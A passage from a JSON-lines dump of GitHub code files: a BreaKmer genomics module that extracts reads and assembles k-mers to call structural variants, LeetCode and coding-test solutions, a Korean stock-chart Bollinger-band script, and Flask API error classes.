reads from %s to %s' % (self.params.opts['%s_bam_file' % bam_type], self.files['sv_fq']))\n\n bamfile = pysam.Samfile(self.params.opts['%s_bam_file' % bam_type], 'rb')\n if sample_type == 'sv':\n sv_bam = pysam.Samfile(self.files['sv_bam'], 'wb', template=bamfile)\n\n read_d = {'unmapped':{},\n 'disc':{},\n 'sv':{},\n 'unmapped_keep':[],\n 'inv_reads':[],\n 'td_reads':[],\n 'other':[]\n }\n\n buffer_size = int(self.params.get_param('buffer_size'))\n kmer_size = int(self.params.get_param('kmer_size'))\n\n utils.log(self.logging_name, 'debug', 'Fetching bam file reads from %s, %s %d %d' % (self.params.opts['%s_bam_file' % bam_type], self.chrom, self.start - buffer_size, self.end + buffer_size))\n aligned_reads = bamfile.fetch(self.chrom, self.start - buffer_size, self.end + buffer_size)\n\n pair_indices = {}\n valid_reads = []\n\n for aligned_read in aligned_reads:\n\n if aligned_read.is_duplicate or aligned_read.is_qcfail: 
# Skip duplicates and failures\n continue\n if aligned_read.is_unmapped: # Store unmapped reads\n read_d['unmapped'][aligned_read.qname] = aligned_read\n continue\n\n if aligned_read.mate_is_unmapped or aligned_read.rnext == -1: # Indicate that mate is unmapped\n aligned_read.mate_is_unmapped = True\n\n proper_map = False\n overlap_reads = False\n\n # These two functions can operate on the first read of the pair.\n # Check if fragment hasn't been checked yet and that the mate is mapped.\n if aligned_read.qname not in pair_indices and not aligned_read.mate_is_unmapped:\n add_discordant_pe(aligned_read, read_d, bamfile)\n proper_map, overlap_reads = pe_meta(aligned_read)\n valid_reads.append((aligned_read, proper_map, overlap_reads))\n\n if aligned_read.qname not in pair_indices and not aligned_read.mate_is_unmapped:\n pair_indices[aligned_read.qname] = {}\n if aligned_read.qname in pair_indices:\n pair_indices[aligned_read.qname][int(aligned_read.is_read1)] = len(valid_reads) - 1\n\n # If read is mapped and mate is unmapped\n if (aligned_read.pos >= self.start and aligned_read.pos <= self.end) and aligned_read.mapq > 0 and aligned_read.mate_is_unmapped:\n read_d['unmapped_keep'].append(aligned_read.qname)\n # pair_indices, valid_reads = process_reads(areads, read_d, bamfile) # Deprecated\n\n # for aread, proper_map, overlap_reads in valid_reads: # Deprecated\n # Only take soft-clips from outer regions of properly mapped reads, take all others\n if (aligned_read.cigar is None) or (len(aligned_read.cigar) <= 1): # cigar is a list of tuples\n continue\n\n # if aligned_read.cigar and len(aligned_read.cigar) > 1:\n trim_coords = utils.trim_coords(aligned_read.qual, 3) # Identify the read positions with qual > 2\n clip_coords = utils.get_clip_coords(aligned_read.qual, aligned_read.cigar)\n\n # Only keep reads that have a soft clip in sequence that has not been trimmed\n # due to low quality sequence.\n # if clip_coords[0] > trim_coords[0] or clip_coords[1] < trim_coords[1]: # Deprecated\n if clip_coords[0] <= trim_coords[0] and clip_coords[1] >= trim_coords[1]:\n continue\n\n sc_seq = {'clipped':[], 'buffered':[]}\n new_clip_coords = [0, 0]\n start_coord, end_coord = clip_coords\n add_sc = [False, False]\n indel_only = False\n start_sc = start_coord > 0\n end_sc = end_coord < len(aligned_read.qual)\n seq = aligned_read.seq\n\n if start_sc and end_sc:\n add_sc = [True, True]\n else:\n if start_sc:\n add_sc[0] = True\n new_clip_coords = [0, start_coord]\n if overlap_reads and aligned_read.is_reverse:\n mate_seq = valid_reads[pair_indices[aligned_read.qname][int(aligned_read.is_read1)]][0].seq\n add_sc[0] = self.check_pair_overlap(mate_seq, aligned_read, [0, start_coord], 'back')\n if proper_map:\n indel_only = aligned_read.is_reverse\n elif end_sc:\n new_clip_coords = [end_coord, len(seq)]\n add_sc[1] = True\n if overlap_reads and not aligned_read.is_reverse:\n mate_seq = valid_reads[pair_indices[aligned_read.qname][int(aligned_read.is_read1)]][0].seq\n add_sc[1] = self.check_pair_overlap(mate_seq, aligned_read, [end_coord, len(seq)], 'front')\n if proper_map:\n indel_only = (indel_only and False) if aligned_read.is_reverse else (indel_only and True)\n final_add = add_sc[0] or add_sc[1]\n if add_sc[0]:\n sc_seq['buffered'].append(aligned_read.seq[0:(start_coord + kmer_size)])\n sc_seq['clipped'].append(aligned_read.seq[0:start_coord])\n if add_sc[1]:\n sc_seq['buffered'].append(seq[(end_coord - kmer_size):len(seq)])\n sc_seq['clipped'].append(seq[end_coord:len(seq)])\n if final_add:\n 
read_d['sv'][utils.get_seq_readname(aligned_read)] = (aligned_read, sc_seq, new_clip_coords, indel_only)\n # end for loop\n\n sv_fq = open(self.files['sv_fq'], 'w')\n sv_sc_fa = open(self.files['sv_sc_unmapped_fa'], 'w')\n\n for qname in read_d['unmapped_keep']:\n if qname in read_d['unmapped']:\n read = read_d['unmapped'][qname]\n read_d['sv'][utils.get_seq_readname(read)] = (read, None, None, False)\n sv_sc_fa.write(\">\" + read.qname + \"\\n\" + str(read.seq) + \"\\n\")\n\n if not self.sv_reads:\n self.sv_reads = {}\n self.sv_reads[sample_type] = {}\n for qname in read_d['sv']:\n aligned_read, sc_seq, clip_coords, indel_only = read_d['sv'][qname]\n self.sv_reads[sample_type][qname] = read_d['sv'][qname]\n if sample_type == 'sv':\n sv_bam.write(aligned_read)\n lout = utils.fq_line(aligned_read, indel_only, int(self.params.get_param('kmer_size')), True)\n if lout is not None:\n sv_fq.write(lout)\n if sc_seq:\n for clip_seq in sc_seq['buffered']:\n sv_sc_fa.write(\">\" + qname + \"\\n\" + clip_seq + \"\\n\")\n self.disc_reads = {'disc':read_d['disc'], 'inv':read_d['inv_reads'], 'td':read_d['td_reads'], 'other':read_d['other']}\n sv_fq.close()\n sv_sc_fa.close()\n bamfile.close()\n\n if sample_type == 'sv':\n sv_bam.close()\n utils.log(self.logging_name, 'info', 'Sorting bam file %s to %s' % (self.files['sv_bam'], self.files['sv_bam_sorted']))\n pysam.sort(\"-o\", self.files['sv_bam_sorted'], self.files['sv_bam'])\n utils.log(self.logging_name, 'info', 'Indexing sorted bam file %s' % self.files['sv_bam_sorted'])\n pysam.index(self.files['sv_bam_sorted'])\n\n def clean_reads(self, sample_type):\n\n '''\n '''\n\n # Run cleaning program\n cutadapt = self.params.get_param('cutadapt')\n cutadapt_config = self.params.get_param('cutadapt_config_file')\n utils.log(self.logging_name, 'info', 'Cleaning reads using %s with configuration file %s' % (cutadapt, cutadapt_config))\n\n self.files['%s_cleaned_fq' % sample_type] = os.path.join(self.paths['data'], self.name + \"_%s_reads_cleaned.fastq\" % sample_type)\n\n utils.log(self.logging_name, 'info', 'Writing clean reads to %s' % self.files['%s_cleaned_fq' % sample_type])\n cutadapt_parameters = utils.stringify(cutadapt_config)\n cutadapt_cmd = '%s %s %s %s > %s' % (sys.executable, cutadapt, cutadapt_parameters, self.files['%s_fq' % sample_type], self.files['%s_cleaned_fq' % sample_type])\n utils.log(self.logging_name, 'debug', 'Cutadapt system command %s' % cutadapt_cmd)\n cutadapt_proc = subprocess.Popen(cutadapt_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n output, errors = cutadapt_proc.communicate()\n utils.log(self.logging_name, 'debug', 'Clean reads output %s' % output)\n utils.log(self.logging_name, 'debug', 'Clean reads errors %s' % errors)\n\n # Use these for pulling out reads after finding sample-only kmers.\n # Filter the cleaned reads to make sure soft clips were not adapters, re-write fastq\n if not self.cleaned_read_recs:\n self.cleaned_read_recs = {}\n self.cleaned_read_recs[sample_type] = None\n self.files['%s_cleaned_fq' % sample_type], self.cleaned_read_recs[sample_type] = utils.get_fastq_reads(self.files['%s_cleaned_fq' % sample_type], self.sv_reads[sample_type])\n self.sv_reads[sample_type] = None\n check = True\n if len(self.cleaned_read_recs[sample_type]) == 0:\n check = False\n\n utils.log(self.logging_name, 'info', 'Check there are cleaned reads %r' % check)\n return check\n\n def compare_kmers(self):\n\n '''\n '''\n\n self.kmers['ref'] = {}\n jellyfish = self.params.get_param('jellyfish')\n kmer_size = 
int(self.params.get_param('kmer_size'))\n\n for i in range(len(self.files['target_ref_fn'])):\n utils.log(self.logging_name, 'info', 'Indexing kmers for reference sequence %s' % self.files['target_ref_fn'][i])\n self.kmers['ref'] = utils.load_kmers(utils.run_jellyfish(self.files['target_ref_fn'][i], jellyfish, kmer_size), self.kmers['ref'])\n\n # if 'target_altref_fn' in self.files:\n # for i in range(len(self.files['target_altref_fn'])):\n # for j in range(len(self.files['target_altref_fn'][i])):\n # utils.log(self.logging_name, 'info', 'Indexing kmers for reference sequence %s' % self.files['target_altref_fn'][i])\n # self.kmers['ref'] = utils.load_kmers(utils.run_jellyfish(self.files['target_altref_fn'][i][j], jellyfish, kmer_size), self.kmers['ref'])\n\n utils.log(self.logging_name, 'info', 'Indexing kmers for sample sequence %s' % self.files['sv_cleaned_fq'])\n self.kmers['case'] = {}\n self.kmers['case'] = utils.load_kmers(utils.run_jellyfish(self.files['sv_cleaned_fq'], jellyfish, kmer_size), self.kmers['case'])\n self.kmers['case_sc'] = {}\n self.kmers['case_sc'] = utils.load_kmers(utils.run_jellyfish(self.files['sv_sc_unmapped_fa'], jellyfish, kmer_size), self.kmers['case_sc'])\n sc_mers = set(self.kmers['case'].keys()) & set(self.kmers['case_sc'])\n sample_only_mers = list(sc_mers.difference(set(self.kmers['ref'].keys())))\n\n if 'normal_bam_file' in self.params.opts:\n norm_kmers = {}\n norm_kmers = utils.load_kmers(utils.run_jellyfish(self.files['norm_cleaned_fq'], jellyfish, kmer_size), norm_kmers)\n sample_only_mers = set(sample_only_mers).difference(set(norm_kmers.keys()))\n\n sample_only_mers = list(sample_only_mers)\n\n # Write case only kmers out to file.\n self.files['sample_kmers'] = os.path.join(self.paths['kmers'], self.name + \"_sample_kmers.out\")\n sample_kmer_fout = open(self.files['sample_kmers'], 'w')\n\n self.kmers['case_only'] = {}\n for mer in sample_only_mers:\n sample_kmer_fout.write(\"\\t\".join([str(x) for x in [mer, str(self.kmers['case'][mer])]]) + \"\\n\")\n self.kmers['case_only'][mer] = self.kmers['case'][mer]\n sample_kmer_fout.close()\n\n self.kmers['ref'] = {}\n self.kmers['case'] = {}\n self.kmers['case_sc'] = {}\n\n utils.log(self.logging_name, 'info', 'Writing %d sample-only kmers to file %s' % (len(self.kmers['case_only']), self.files['sample_kmers']))\n self.files['kmer_clusters'] = os.path.join(self.paths['kmers'], self.name + \"_sample_kmers_merged.out\")\n utils.log(self.logging_name, 'info', 'Writing kmer clusters to file %s' % self.files['kmer_clusters'])\n\n self.contigs = assembler.init_assembly(self.kmers['case_only'], self.cleaned_read_recs['sv'], kmer_size, int(self.params.get_param('trl_sr_thresh')), self.params.get_param('read_len'))\n self.cleaned_read_recs = None\n self.kmers['case_only'] = {}\n self.finalize_contigs()\n\n def finalize_contigs(self):\n\n '''\n '''\n\n utils.log(self.logging_name, 'info', 'Finalizing %d assembled contigs' % len(self.contigs))\n for contig_iter, assembled_contig in enumerate(self.contigs):\n utils.log(self.logging_name, 'info', 'Finalizing contig %s' % assembled_contig.seq.value)\n contig_id = self.name + '-contig' + str(contig_iter + 1)\n assembled_contig.write_contig_values(contig_id, self.files['kmer_clusters'], self.paths['contigs'])\n\n def resolve_sv(self):\n\n '''\n '''\n\n utils.log(self.logging_name, 'info', 'Resolving structural variants from %d kmer clusters' % len(self.contigs))\n self.results = self.call_manager.resolve_sv_calls(self.contigs, self.files['target_ref_fn'][0], 
self.get_values(), self.disc_reads)\n # print self.results\n # sys.exit()\n # contig_iter = 1\n # utils.log(self.logging_name, 'info', 'Resolving structural variants from %d kmer clusters' % len(self.contigs))\n # for assembled_contig in self.contigs:\n # utils.log(self.logging_name, 'info', 'Assessing contig %s' % assembled_contig.seq.value)\n # contig_id = 'contig' + str(contig_iter)\n # ctig = contig.TargetContig(self, contig_id, assembled_contig)\n # ctig.query_ref(self.files['target_ref_fn'][0], self.get_values())\n # ctig.make_calls(self.get_values(), self.disc_reads, self.repeat_mask)\n\n # if ctig.has_result():\n # ctig.write_result(self.paths['output'])\n # ctig.write_bam(self.files['sv_bam_sorted'], self.paths['output'])\n # self.results.append(ctig.result)\n # else:\n # utils.log(self.logging_name, 'info', '%s has no structural variant result.' % ctig.id)\n # contig_iter += 1\n\n def get_values(self):\n\n '''\n '''\n\n return (self.chrom, self.start, self.end, self.name, self.target_intervals)\n\n def has_results(self):\n\n '''\n '''\n\n return len(self.results) > 0\n\n def add_path(self, key, path):\n\n '''Utility function to create all the output directories.\n\n Args:\n key (str): String value to store the file path value.\n path (str): File path value.\n Returns:\n None\n Raises:\n None\n '''\n\n utils.log(self.logging_name, 'info', 'Creating %s %s path (%s)' % (self.name, key, path))\n self.paths[key] = path\n if not os.path.exists(self.paths[key]):\n os.makedirs(self.paths[key])\n\n def set_ref_data(self):\n\n '''\n '''\n\n # Write rmask bed file if needed.\n # if not self.params.opts['keep_repeat_regions'] and 'repeat_mask_file' in self.params.opts:\n # self.logger.info('Extracting repeat mask regions for target gene %s.' % self.name)\n # self.repeat_mask = setup_rmask(self.get_values(), self.paths['ref_data'], self.params.opts['repeat_mask_file'])\n\n # Write reference fasta file if needed.\n for target_refseq_fn in self.files['target_ref_fn']:\n direction = \"forward\"\n if target_refseq_fn.find(\"forward\") == -1:\n direction = \"reverse\"\n utils.log(self.logging_name, 'info', 'Extracting refseq sequence and writing %s' % target_refseq_fn)\n utils.extract_refseq_fa(self.get_values(), self.paths['ref_data'], self.params.get_param('reference_fasta'), direction, target_refseq_fn, self.params.get_param('buffer_size'))\n\n # def setup_rmask(self,marker_fn):\n\n # '''\n # '''\n\n # # Iterate through genes in target list and find repeats in those genes.\n # self.repeat_mask = []\n # if not os.path.isfile(marker_fn):\n # out_fn = self.files['rep_mask_fn']\n # fout = open(out_fn,'w')\n # f = open(self.params.opts['repeat_mask_file'],'rU')\n # flines = f.readlines()\n # for line in flines:\n # line = line.strip()\n # rchr,rbp1,rbp2,rname = line.split(\"\\t\")[0:4]\n # rchr = rchr.replace('chr','')\n # if rchr == self.chrom:\n # if int(rbp1) >= self.start and int(rbp2) <= self.end:\n # fout.write(\"\\t\".join([str(x) for x in [rchr,int(rbp1),int(rbp2),rname]])+\"\\n\")\n # self.repeat_mask.append((rchr,int(rbp1),int(rbp2),rname))\n # f.close()\n # fout.close()\n # cmd = 'touch %s'%marker_fn\n # p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)\n # output, errors = p.communicate()\n # self.logger.info('Completed writing repeat mask file %s, touching marker file %s'%(out_fn,marker_fn))\n # else:\n # rep_f = open(self.files['rep_mask_fn'],'rU')\n # rep_flines = rep_f.readlines()\n # for line in rep_flines:\n # line = line.strip()\n # 
rchr,rbp1,rbp2,rname = line.split()\n # self.repeat_mask.append((rchr,int(rbp1),int(rbp2),rname))\n # rep_f.close()\n\n # def add_discordant_pe(self, aread, read_d, bamfile):\n # qname = aread.qname\n # # Keep discordant read pairs\n # if aread.mapq > 0 and ((aread.rnext!=-1 and aread.tid != aread.rnext) or abs(aread.tlen) > 1000) and not aread.mate_is_unmapped:\n # mate_refid = bamfile.getrname(aread.rnext)\n # mate_read = bamfile.mate(aread)\n # if mate_read.mapq > 0:\n # if mate_refid not in read_d['disc']: read_d['disc'][mate_refid] = []\n # read_d['disc'][mate_refid].append((aread.pos, aread.pnext))\n\n # if aread.mapq > 0 and not aread.mate_is_unmapped and aread.tid == aread.mrnm:\n # if aread.is_read1:\n # read_positions = None\n # if aread.is_reverse and aread.mate_is_reverse:\n # # reverse -- reverse, samflag 115 (note: only considering read1, read2 samflag 179)\n # read_positions = (aread.pos, aread.mpos, 0, 0, qname)\n # if aread.mpos < aread.pos: read_positions = (aread.mpos, aread.pos, 0, 0, qname)\n # read_d['inv_reads'].append(read_positions)\n # elif not aread.is_reverse and not aread.mate_is_reverse:\n # # forward -- forward = samflag 67 (note: only considering read1, read2 samflag 131)\n # read_positions = (aread.pos, aread.mpos, 1, 1, qname)\n # if aread.mpos < aread.pos: read_positions = (aread.mpos, aread.pos, 1, 1, qname)\n # read_d['inv_reads'].append(read_positions)\n # elif aread.is_reverse and not aread.mate_is_reverse and aread.pos < aread.mpos:\n # # reverse -- forward = samflag 83 with positive insert (read2 samflag 163 with + insert size)\n # read_positions = (aread.pos, aread.mpos, 0, 1, aread.qname)\n # read_d['td_reads'].append(read_positions)\n # elif not aread.is_reverse and aread.mate_is_reverse and aread.mpos < aread.pos:\n # # reverse -- forward = samflag 99 with - insert (read2 samflag 147 with - insert)\n # read_positions = (aread.mpos, aread.pos, 1, 0, qname)\n # read_d['td_reads'].append(read_positions)\n # if read_positions: read_d['other'].append(read_positions)\n\n # def pe_meta(self, aread):\n\n # '''\n # '''\n\n # # First check if read is from a proper paired-end mapping --> <--\n # proper_map = False\n # overlap_reads = False\n # if ( ((aread.flag==83) or (aread.flag==147)) and (aread.isize<0) ) or (((aread.flag==99) or (aread.flag==163)) and (aread.isize>0)):\n # proper_map = True\n # if abs(aread.isize) < 2*len(aread.seq):\n # overlap_reads = True\n # return proper_map, overlap_reads\n\n def check_overlap(self, dir, mseq, sc_seq):\n\n '''\n '''\n\n if dir == 'back':\n return mseq.find(sc_seq) != (len(mseq)-len(sc_seq))\n else: return mseq.find(sc_seq) != 0\n\n\n def check_pair_overlap(self, mate_seq, read, coords, trim_dir):\n\n '''\n '''\n\n nmisses = 0\n add_sc = True\n sc_seq = read.seq[coords[0]:coords[1]]\n sc_len = coords[1] - coords[0]\n\n if abs(read.isize) < len(read.seq):\n # Adapter seq\n if abs(len(read.seq) - (abs(read.isize)+1)) >= sc_len:\n add_sc = False\n # print 'Adapter seq', sc_len, abs(read.isize), abs(len(read.seq) - abs(read.isize)), add_sc\n else:\n # abs((2*len(read.seq) - (abs(read.isize)+1)) - sc_len) < 5: add_sc_len_check = False\n while self.check_overlap(trim_dir, mate_seq, sc_seq) and nmisses < 5 and len(sc_seq) > 0:\n if trim_dir == 'back':\n sc_seq = sc_seq[0:(len(sc_seq)-1)]\n else:\n sc_seq = sc_seq[1:len(sc_seq)]\n nmisses += 1\n # print 'Done checking', sc_seq, nmisses\n add_sc = (len(sc_seq) == 0) or (nmisses == 5)\n # if trim_dir == 'back':\n # q = read.qual\n # read.seq = read.seq[coords[1]:len(q)]\n 
# read.qual = q[coords[1]:len(q)]\n        # else:\n        #     indx = read.seq.find(sc_seq)\n        #     q = read.qual\n        #     read.seq = read.seq[0:coords[0]]\n        #     read.qual = q[0:coords[0]]\n        # print 'Checked read pair overlap', read.qname, read.seq\n        # print 'Using mate seq check', add_sc, sc_seq, mate_seq\n        return add_sc #, read\n\n    # def write_results(self):\n\n    #     '''\n    #     '''\n\n    #     result_files = {}\n    #     for res in self.results:\n    #         tag = res[6]\n    #         if tag.find('rearrangement') > -1:\n    #             tag = 'rearrangement'\n    #         if tag not in result_files:\n    #             header = \"\\t\".join(['genes', 'target_breakpoints', 'align_cigar', 'mismatches', 'strands', 'rep_overlap_segment_len', 'sv_type', 'split_read_count', 'nkmers', 'disc_read_count', 'breakpoint_coverages', 'contig_id', 'contig_seq']) + \"\\n\"\n    #             res_fn = os.path.join(self.paths['output'], self.name + \"_\" + tag + \"_svs.out\")\n    #             utils.log(self.logging_name, 'info', 'Writing %s results to file %s' % (tag, res_fn))\n    #             result_files[tag] = open(res_fn, 'w')\n    #             if not self.params.opts['no_output_header']:\n    #                 result_files[tag].write(header)\n    #         result_files[tag].write(\"\\t\".join([str(x) for x in res]) + \"\\n\")\n    #     for f in result_files:\n    #         result_files[f].close()\n\n    def write_results(self):\n\n        '''\n        '''\n\n        res_fn = os.path.join(self.paths['output'], self.name + \"_svs.out\")\n        result_file = open(res_fn, 'w')\n        header = \"\\t\".join(['genes', 'target_breakpoints', 'mismatches', 'strands', 'total_matching', 'sv_type', 'sv_subtype', 'split_read_count', 'disc_read_count', 'breakpoint_coverages', 'contig_id', 'contig_seq']) + \"\\n\"\n        result_file.write(header)\n\n        for res in self.results:\n            utils.log(self.logging_name, 'info', 'Writing results to file: %s' % res_fn)\n            formatted_result_str = res.get_output_string()\n            result_file.write(formatted_result_str)\n            self.formatted_results.append(formatted_result_str)\n        result_file.close()\n\n    def get_sv_counts(self):\n\n        '''\n        '''\n\n        total = 0\n        rearr_genes = []\n        for res in self.results:\n            tag = res[6]\n            if tag.find('rearrangement') > -1:\n                tag = 'rearrangement'\n            if tag == 'rearrangement':\n                genes = res[0].split(\",\")\n                genes.sort()\n                rearr_genes.append(\";\".join(genes))\n            else:\n                self.svs[tag][0] += 1\n                total += 1\n        if len(set(rearr_genes)) > 0:\n            total += len(set(rearr_genes))\n            self.svs['rearrangement'][0] = len(set(rearr_genes))\n            self.svs['rearrangement'][1] = \",\".join(list(set(rearr_genes)))\n        return total\n\n    def get_summary(self):\n\n        '''\n        '''\n\n        header = ['Target','N_contigs', 'Total_variants']\n        total = self.get_sv_counts()\n        str_out = self.name + '\\t' + str(len(self.contigs)) + '\\t' + str(total) + '\\t'\n        keys = self.svs.keys()\n        keys.sort()\n        header += ['N_'+str(x) for x in keys]\n        rearrs = '-'\n        for t in keys:\n            if t == 'rearrangement':\n                rearrs = self.svs[t][1]\n            str_out += str(self.svs[t][0]) +'\\t'\n        header.append('Rearrangements')\n        str_out += rearrs\n        return \"\\t\".join(header), str_out\n\n    def rm_output_dir(self):\n\n        '''\n        '''\n\n        shutil.rmtree(self.paths['output'])\n","repo_name":"teng-gao/BreaKmer_analysis","sub_path":"breakmer/processor/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":35313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25569382774","text":"class Solution:\n    # @return a list of integers\n    def grayCode(self, n):\n        if( n<= 0):\n            return [0]\n        result = self.BinaryGray(n)\n        for i in range(len(result)):\n            result[i] = int(result[i] ,2)\n        return result\n\n\n    def BinaryGray(self, n):\n        if (n == 1):\n            return ['0','1']\n        \n        temp 
= self.BinaryGray(n-1)\n temp1 = self.BinaryGray(n-1)\n temp1.reverse()\n \n result = []\n for i in range(len(temp)):\n result.append('0'+ temp[i])\n \n for i in range(len(temp1)):\n result.append('1'+temp1[i])\n return result\n","repo_name":"jinmingmu/codeingInterview","sub_path":"Gray_Code.py","file_name":"Gray_Code.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37122270972","text":"def solution(survey, choices):\n\n # 유형별 점수 및 유형별 index\n scores = [0] * 8\n dic = {'R': 0, 'T': 1, 'C': 2, 'F': 3, 'J': 4, 'M': 5, 'A': 6, 'N': 7}\n\n # 질문에 따라 점수를 더함\n for i in range(len(survey)):\n score = choices[i] - 4\n if score < 0:\n scores[dic[survey[i][0]]] -= score\n elif score > 0:\n scores[dic[survey[i][1]]] += score\n\n # 검사 결과\n answer = ''\n answer += 'T' if scores[0] < scores[1] else 'R'\n answer += 'F' if scores[2] < scores[3] else 'C'\n answer += 'M' if scores[4] < scores[5] else 'J'\n answer += 'N' if scores[6] < scores[7] else 'A'\n return answer","repo_name":"sohyeonnn/Problem-Solving","sub_path":"프로그래머스/lv1/118666. 성격 유형 검사하기/성격 유형 검사하기.py","file_name":"성격 유형 검사하기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40253681208","text":"'''\nhttps://leetcode-cn.com/problems/subarray-sums-divisible-by-k\n\n给定一个整数数组 A,返回其中元素之和可被 K 整除的(连续、非空)子数组的数目。\n \n示例:\n输入:A = [4,5,0,-2,-3,1], K = 5\n输出:7\n解释:\n有 7 个子数组满足其元素之和可被 K = 5 整除:\n[4, 5, 0, -2, -3, 1], [5], [5, 0], [5, 0, -2, -3], [0], [0, -2, -3], [-2, -3]\n\n \n提示:\n\n1 <= A.length <= 30000\n-10000 <= A[i] <= 10000\n2 <= K <= 10000\n'''\n\nclass Solution:\n def subarraysDivByK(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: int\n \"\"\"\n \n\n\nif __name__ == '__main__':\n s = Solution()\n # ret = s.\n print(s)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0974 和可被 K 整除的子数组(Subarray Sums Divisible by K).py","file_name":"0974 和可被 K 整除的子数组(Subarray Sums Divisible by K).py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"5845947749","text":"import matplotlib.pyplot as plt\nfrom investar import Analyzer\n\nmk = Analyzer.MarketDB()\ndf = mk.get_daily_price('금양','2019-12-31','2023-03-06')\n \ndf['MA20'] = df['close'].rolling(window=20).mean() \ndf['stddev'] = df['close'].rolling(window=20).std() \ndf['upper'] = df['MA20'] + (df['stddev'] * 2)\ndf['lower'] = df['MA20'] - (df['stddev'] * 2)\ndf['PB'] = (df['close'] - df['lower']) / (df['upper'] - df['lower'])\n\ndf['II'] = (2*df['close']-df['high']-df['low'])/(df['high']-df['low'])*df['volume']\ndf['IIP21'] = df['II'].rolling(window=21).sum()/df['volume'].rolling(window=21).sum()*100\ndf = df.dropna()\n\nplt.figure(figsize=(9, 9))\nplt.subplot(3, 1, 1)\nplt.title('SK Hynix Bollinger Band(20 day, 2 std) - Reversals')\nplt.plot(df.index, df['close'], 'm', label='Close')\nplt.plot(df.index, df['upper'], 'r--', label ='Upper band')\nplt.plot(df.index, df['MA20'], 'k--', label='Moving average 20')\nplt.plot(df.index, df['lower'], 'c--', label ='Lower band')\nplt.fill_between(df.index, df['upper'], df['lower'], color='0.9')\nfor i in range(0, len(df.close)):\n if df.PB.values[i] < 0.05 and df.IIP21.values[i] > 0: # ①%b가 0.05보다 작고,21일 기준II%가 0보다 크다면\n plt.plot(df.index.values[i], df.close.values[i], 'r^') # ②첫번째 그래프에서 매수 시점을 나타내는 종가 위치에 
빨간색삼각형을 표시\n elif df.PB.values[i] > 0.95 and df.IIP21.values[i] < 0: # ③%b가 0.95보다크고,21일 기준II%가 0보다 작으면\n plt.plot(df.index.values[i], df.close.values[i], 'bv') # ④첫번째 그래프에 매도 시점을 나타내는 종가위치에 파란색 삼각형을 표시\nplt.legend(loc='best')\n\nplt.subplot(3, 1, 2)\nplt.plot(df.index, df['PB'], 'b', label='%b')\nplt.grid(True)\nplt.legend(loc='best')\n\nplt.subplot(3, 1, 3)\nplt.bar(df.index, df['IIP21'], color='g', label='II% 21day')\nfor i in range(0, len(df.close)):\n if df.PB.values[i] < 0.05 and df.IIP21.values[i] > 0:\n plt.plot(df.index.values[i], 0, 'r^') # ⑤세 번째 일중강도율 그래프에서 매수시점을 빨간색 삼각형으로 표시\n elif df.PB.values[i] > 0.95 and df.IIP21.values[i] < 0:\n plt.plot(df.index.values[i], 0, 'bv') # ⑥세번째 일중강도율 그래프에서 매도시점을 파란색삼각형으로 표시\nplt.grid(True)\nplt.legend(loc='best')\nplt.show()\n\n \n","repo_name":"syslians/investar","sub_path":"BolingerbandSKrevals.py","file_name":"BolingerbandSKrevals.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71805231289","text":"from flask_api import FlaskAPI\nfrom flask import Flask, request, jsonify, render_template, make_response\n\napi = FlaskAPI(__name__)\n\nclass BaseError(Exception):\n \"\"\"Base Error Class\"\"\"\n\n def __init__(self, code=400, message='', status='', field=None):\n Exception.__init__(self)\n self.code = code\n self.message = message\n self.status = status\n self.field = field\n\n def to_dict(self):\n return {'code': self.code,\n 'message': self.message,\n 'status': self.status,\n 'field': self.field, }\n\nclass NotFoundError(BaseError):\n def __init__(self,field, message='Not found'):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'NOT_FOUND'\n self.field = field\n\nclass FileWriteError(BaseError):\n def __init__(self,field, message='Write error'):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'WRITE_FAILED'\n self.field = field\n\nclass ConnectionError(BaseError):\n def __init__(self,field, message=\"Couldn't connect\"):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'NO_CONNECTION'\n self.field = field\n\nclass NotAuthorizedError(BaseError):\n def __init__(self, message='Unauthorized'):\n BaseError.__init__(self)\n self.code = 401\n self.message = message\n self.status = 'NOT_AUTHORIZED'\n\n\nclass ValidationError(BaseError):\n def __init__(self, field, message='Invalid field'):\n BaseError.__init__(self)\n self.code = 400\n self.message = message\n self.status = 'INVALID_FIELD'\n self.field = field\n\nclass InvalidServiceError(BaseError):\n def __init__(self, field, message='Invalid field'):\n BaseError.__init__(self)\n self.code = 400\n self.message = message\n self.status = 'INVALID_SERVICE'\n self.field = field\n\nclass ServerError(BaseError):\n def __init__(self, message='Internal server error'):\n BaseError.__init__(self)\n self.code = 500\n self.message = message\n self.status = 'SERVER_ERROR'\n\n@api.errorhandler(NotFoundError)\n@api.errorhandler(NotAuthorizedError)\n@api.errorhandler(ValidationError)\n@api.errorhandler(InvalidServiceError)\n\ndef handle_error(error):\n code=getattr(error,'code')\n status = getattr(error, 'status')\n field = [getattr(error, 'field')]\n code = getattr(error, 'code')\n message = getattr(error, 'message')\n success = False\n return make_error(status,field,code,message,success)\n # ,code,message)\n\n\n@api.errorhandler\ndef default_error_handler(error):\n \"\"\"Returns Internal server 
